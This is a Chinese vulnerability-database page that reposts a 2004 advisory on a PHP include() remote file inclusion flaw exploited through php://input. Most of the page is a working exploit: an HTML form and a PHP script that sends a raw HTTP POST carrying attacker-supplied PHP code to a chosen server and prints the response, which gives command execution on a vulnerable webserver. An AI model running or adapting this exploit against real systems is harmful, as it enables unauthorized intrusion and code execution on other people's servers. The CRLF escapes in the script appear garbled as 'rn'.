PHP 4/5 – Input/Output Wrapper Remote File Inclusion Function Command Execution
漏洞ID | 1054479 | 漏洞类型 | |
发布时间 | 2004-05-27 | 更新时间 | 2004-05-27 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | PHP | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10427/info
PHP is reportedly affected by an arbitrary command-execution weakness through the PHP 'include()' function. This issue is due to a design error that allows the execution of attacker-supplied POST PHP commands when URI data is used as an argument to an 'include()' function.
This issue affect the PHP module itself; however, the problem presents itself only when an application uses a user-supplied URI parameter as an argument to the 'include()' function.
This issue is reported to affect all versions of PHP since 3.0.13. Furthermore, this issue is not resolved by setting the 'php.ini' variable 'allow_url_fopen' to off.
Successful exploitation of this issue will allow an attacker to execute arbitrary PHP code on the affected computer; this will allow the execution of commands to the underlying operating system with the privileges of the affected webserver process.
<form action="" methode="post" >
target server : <input type="text" name="server" ><br><br>
target file (including URI parameter used in include() call ex:"index.php?includeParam=") : <input type="text" name="file" ><br><br>
exec (enclose php commands between <? .. ?> tags): <input type="text" name="cmd" ><br><br>
<INPUT type="submit" value="send">
</form>
<?
if($cmd){
$message = "POST /".$file."php://input HTTP/1.1rn";
$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*rn";
$message .= "Accept-Language: frrn";
$message .= "Content-Type: application/x-www-form-urlencodedrn";
$message .= "Accept-Encoding: deflatern";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2)rn";
$message .= "Host: ".$server."rn";
$message .= "Content-length: ".strlen( $cmd )."rn";
$message .= "Connection: Keep-Alivern";
$message .= "Cache-Control: no-cachern";
$message .= "rn";
$message .= $cmd."rn";
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
while(!feof($fd)) {
echo fgets($fd,1280);
}
fclose($fd);
}
?>
相关推荐: eL DAPo Authentication Information Disclosure Weakness
eL DAPo Authentication Information Disclosure Weakness 漏洞ID 1100977 漏洞类型 Design Error 发布时间 2003-01-30 更新时间 2003-01-30 CVE编号 N/A CN…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666